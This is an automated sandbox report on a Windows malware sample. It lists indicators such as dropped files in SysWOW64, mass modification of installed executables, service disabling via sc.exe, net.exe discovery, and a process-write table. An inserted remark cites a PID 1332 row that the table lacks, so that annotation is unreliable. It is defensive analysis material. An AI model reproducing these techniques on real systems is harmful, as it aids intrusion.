Malware Analysis Report

2025-08-10 15:24

Sample ID: 241103-f2vyyswdmb
Target: e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb
SHA256: e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb
Tags: discovery evasion execution
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10
SHA256: e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb
Threat Level: Known bad

The file e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb was found to be: Known bad.

Malicious Activity Summary

Tactics: discovery, evasion, execution

Disables service(s)
Grants admin privileges
Executes dropped EXE
Loads dropped DLL
Network Share Discovery
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Unsigned PE
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-03 05:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-03 05:22
Reported: 2024-11-03 05:25
Platform: win7-20240903-en
Max time kernel: 148s
Max time network: 121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"

Signatures

Disables service(s)

evasion execution

Grants admin privileges

Network Share Discovery

discovery

Drops file in System32 directory

The recorded command lines refer to C:\Windows\system32\Option.bat and C:\Windows\system32\UpdatAuto.exe, yet the files are created under C:\Windows\SysWOW64\. The sample is a 32-bit process on a 64-bit Windows 7 host, so WOW64 file system redirection maps its system32 references to SysWOW64; the dropped files, and the cmd.exe, net.exe and sc.exe it launches, all live there.

Description Indicator Process Target
File created C:\Windows\SysWOW64\Option.bat C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Windows\SysWOW64\Option.bat C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\Hearts.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\chkrzm.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\DVD Maker\DVDMaker.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\UpdatAuto.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A

Runs net.exe

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
N/A N/A C:\Windows\SysWOW64\UpdatAuto.exe N/A

Suspicious use of WriteProcessMemory

Every row below pairs a process with a child it has just spawned: the sample (PID 2796) writing into the cmd.exe instances, UpdatAuto.exe (PID 2752) and its ~4.exe copy (PID 3000); UpdatAuto.exe into its own cmd.exe; and the crashing ~4.exe into the WerFault.exe that handles its crash. That pattern is consistent with process creation, which writes start-up parameters into the new child, rather than with injection into an unrelated process, so read this table as the process tree and not as evidence of code injection on its own. The table ends after the first row for PID 1332.

Description Indicator Process Target
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 3000 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe C:\Windows\system32\WerFault.exe
PID 3000 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe C:\Windows\system32\WerFault.exe
PID 3000 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe C:\Windows\system32\WerFault.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
